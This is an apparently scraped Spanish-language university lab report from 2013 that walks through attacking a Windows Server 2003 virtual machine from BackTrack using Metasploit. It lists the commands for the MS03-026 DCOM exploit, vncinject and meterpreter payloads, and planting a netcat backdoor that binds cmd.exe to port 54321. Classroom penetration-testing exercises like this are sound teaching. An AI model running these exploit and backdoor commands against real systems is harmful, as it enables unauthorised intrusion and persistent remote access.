You are on page 1of 19

Repblica Bolivariana de Venezuela

Ministerio del Poder Popular para la Defensa


Universidad Nacional Experimental Politcnica de la Fuerza Armada
Bolivariana
Ingeniera de Sistemas
6 Semestre. Seccin A
Sistema Operativo
Ncleo Chuao

PRCTICA DE ATAQUE UTILIZANDO BACKTRACK

Integrantes:
Gianfranco Catapano C.I: 24.222.125
Mara Carolina Pesquera C.I: 21.344.216
Ricardo Zambrano C.I:19.397.089
ngel Echeverra C.I: 21.229.222

Caracas, mayo de 2013

Introduccin

La seguridad informtica, es el rea que se enfoca en la proteccin


de la infraestructura computacional y todo lo relacionado con sta
(incluyendo la informacin contenida). Para ello existen una serie de
estndares, protocolos, mtodos, reglas, herramientas y leyes concebidas
para minimizar los posibles riesgos a la infraestructura o a la informacin.
La seguridad informtica comprende software, bases de datos,
metadatos, archivos y todo lo que la organizacin valore (activo) y
signifique un riesgo si sta llega a manos de otras personas. Este tipo de
informacin se conoce como informacin privilegiada o confidencial.
Hoy en dia existen sistemas operativos destinados a la seguridad
informtica

como

por

ejemplo

BackTrack,

que

es

una distribucin GNU/Linux en formato LiveCD pensada y diseada para


la auditora de seguridad y relacionada con la seguridad informtica en
general. Actualmente tiene una gran popularidad y aceptacin en la
comunidad que se mueve en torno a la seguridad informtica.
Se deriva de la unin de dos grandes distribuciones orientadas a la
seguridad, el Auditor + WHAX. WHAX es la evolucin del Whoppix
(WhiteHat Knoppix), el cual pas a basarse en la distribucin
Linux SLAX en lugar de Knoppix. La ltima versin de esta distribucin
cambi el sistema base, antes basado en Slax y ahora en Ubuntu.
Incluye una larga lista de herramientas de seguridad listas para
usar, entre

las

que

destacan

numerosos scanners

de

puertos y

vulnerabilidades, archivos de exploits, sniffers, herramientas de anlisis


forense y herramientas para la auditora Wireless.

En el siguiente informe y mostrando imgenes de las pantallas


nos centramos en facilitar la realizacin de un ataque mediante una
maquina virtual con Backtrack para penetrar una pc ( caso especifico:
otra mquina virtual con Windows Server 2003)

a travs de los

denominados exploits los cuales se definen como una secuencia de


comandos y/o acciones, utilizada con el fin de aprovechar una
vulnerabilidad de seguridad.

Proceso realizado

1- Primero, creamos la mquina virtual de Backtrack; una vez


creada e instalada, actualizamos el sistema operativo utilizando los
comandos apt-get update y apt-get upgrade.

Posteriormente, creamos la mquina virtual d Windows Server


2003, y confirmamos las direcciones IP de ambas mquinas virtuales:

2- En Backtrack, nos ubicamos en la Terminal, liberamos la


direccin IP con los comandos que nos indicaron (sudo dhclient r) y
obtenemos una nueva (sudo dhclient).

Luego, llegamos a la consola de Metasploid y nos indica que hay q


actualizarla, por tanto, utilizamos el siguiente cdigo: msfupdate y
esperamos a que culmine el proceso de actualizacin.

3- En la interfaz de la mquina BackTrack, configuramos la red


como Bridge y usamos en la terminal el siguiente comando para colocar
la direccin IP :
ifconfig eth0 192.168.37.50 netmask 255.255.255.0

4- Usamos el comando show exploits para ver todos los ataques


con los que cuenta Metasploit.

Utilizamos el comando Search 03_026, para ubicar exploits


especficos

5-Cargamos el exploit usando el comando use, seguido del nombre


del exploit. Colocamos el siguiente comando:
use exploit/Windows/dcerpc/ms03_026_dcom

6- Utilizamos el comando show options para ver que distintas


opciones podan ser configuradas en el exploits antes de lanzar el ataque

7-configuramos el parmetro, utilizando el comando: set RHOST


192.168.37.2, que es la direccin IP del servidor de prueba.

8- Una vez seleccionado el destino del ataque, es necesario


configurar el cdigo o la accin que se desea que realice el servidor si el

exploit resulta exitoso. Para obtener una lista con los payloads usamos el
comando show payloads

9- colocamos uno de los payloads de vncinject con el comando:


set payload windows/vncinject/bind_tcp

10- Usamos nuevamente el comando show options.

11- Como los campos tienen los valores correctos, ahora aplicamos
exploit y se desplega una ventana VNC con una consola de comandos
Windows que nos da acceso system al servidor.

12- Esta vez, ejecutamos el mismo exploit pero con un payload


distinto. Configuramos el sistema para que utilice el meterpreter con el
comando:
set payload windows/meterpreter/bind_tcp

13-Como el ataque ejecutado fue exitoso, el prompt se muestra


ahora como meterpreter >

14- Utilizamos help y sale:

15- Una vez probados algunos comandos, configuramos la puerta


trasera con el comando :
upload /rofs/pentest/database/oat/tftproot/windows/netcat/nc.exe c:\
Y luego colocamos Shell para tener acceso por lnea de comando
al sistema vulnerado.

16-configuramos para abrir el puerto 54321 y dar acceso por lnea


de comando de Windows al sistema.
Corrimos el comando:
nc.exe l p 54321 e c:\windows\system32\cmd.exe L

17- Una vez ejecutado el paso anterior, probamos desde un


terminal en la mquina BackTrack el comando:
nc 192.168.37.2 54321

18- Para demostrar que estamos en la mquina, nos metemos en


un directorio, en este caso: Archivos de programas:

19- Utilizamos en una nueva terminal el comando netstat an para


saber los puertos en los que est trabajando el sistema

Conclusin

La seguridad informtica es un campo infinito, nunca se puede


saber y realizar todo lo que uno quiere, Siempre habr alguien ms listo y
que sabr ms, cada da, encontraremos nuevas herramientas que
vulneran nuevos fallos. Con el avance de la tecnologa, harn a los
sistemas ms vulnerables. An as, es nuestra tarea como profesionales,
el intentar minimizar los riesgos, y tratar de hacer las cosas lo mejor
posible. Creemos, que uno de los puntos que hay que ahondar ms, es el
concienciar a las personas para la mejora de sus sistemas.
Mediante el informe se pudo observar que Backtrack es una poderosa
herramienta de hacking y auditoria de sistemas. Est hecho, con toques
elegantes que se suman a la sensacin general de la distribucin. Corre
muy rpido en el modo directo, incluso ms rpido que la mayora de las
distribuciones. Lo ms importante, la matriz de la herramienta de auditora
es rica, bien equilibrada y en general bastante impresionantes.
Al demostrar uno de sus tantos posibles usos a travs de la
prctica realizada con exploits se pudo concluir que Backtrack es un
excelente sistema auditor.
Para la prctica comenzamos por la creacin y configuracin de
dos maquinas virtuales, una con un sistema operativo Backtrack y otra
con un sistema operativo Windows 2003, esta ltima sera destinada a
recibir el ataque.

You might also like